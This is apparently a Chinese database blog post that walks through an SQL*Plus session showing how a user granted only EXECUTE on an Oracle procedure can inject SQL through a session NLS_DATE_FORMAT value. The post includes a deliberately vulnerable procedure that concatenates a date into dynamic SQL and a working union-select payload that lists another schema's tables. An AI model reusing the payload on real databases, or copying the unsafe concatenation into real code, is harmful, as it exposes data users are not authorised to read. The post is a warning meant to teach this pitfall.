jsp sql注入 oracle,oracle sql注入

今天看tom的有提到一个很有趣的东东，只授权的procedure execute，别人就可以sql注入，以后你可得小心了，下面请看我的试验

[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Copyright (c) 1982, 2007, Oracle. All Rights Reserved.

Connected to:

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production

With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER

----------------------------------------------------------------

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi

PL/SQL Release 10.2.0.4.0 - Production

CORE 10.2.0.4.0 Production

TNS for Linux: Version 10.2.0.4.0 - Production

NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME USER_ID CREATED

------------------------------ ---------- -------------------

ZYY 1099 2011-08-30 11:41:03

GZPX_DB 1070 2011-08-30 11:41:01

GIAF 1069 2011-08-30 11:41:01

DEAN_TRAIN 1068 2011-08-30 11:41:01

...

75 rows selected.

SQL> select * from tab;

TNAME TABTYPE CLUSTERID

------------------------------ ------- ----------

TEST TABLE

TESTA TABLE

TESTB TABLE

TESTBLOB TABLE

TESTC TABLE

TESTIMG TABLE

TESTKDR TABLE

TESTXY TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )

2 as

3 l_rec all_users%rowtype;

4 c sys_refcursor;

5 l_query long;

6 begin

7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';

8 dbms_output.put_line( l_query );

9 open c for l_query;

10 for i in 1 .. 10

11 loop

12 fetch c into l_rec;

13 exit when c%notfound;

14 dbms_output.put_line( l_rec.username || '.....' );

15 end loop;

16 close c;

17 end;

18 /

Procedure created.

SQL> set serveroutput on;

SQL> exec badboy(sysdate);

select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme

Connected.

SQL> set serveroutput on

SQL> exec anbob.badboy(sysdate);

select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);

select * from all_users where created = ''union select tname,0,sysdate from tab--'

TEST.....

TESTA.....

TESTB.....

TESTBLOB.....

TESTC.....

TESTIMG.....

TESTKDR.....

TESTXY.....

PL/SQL procedure successfully completed.

呵，是不是很眼熟，这当然是anbob的表，这些表并没有授权给icme。同样也可以从all_column得到列，那样就可以得到表只的一部份数据了...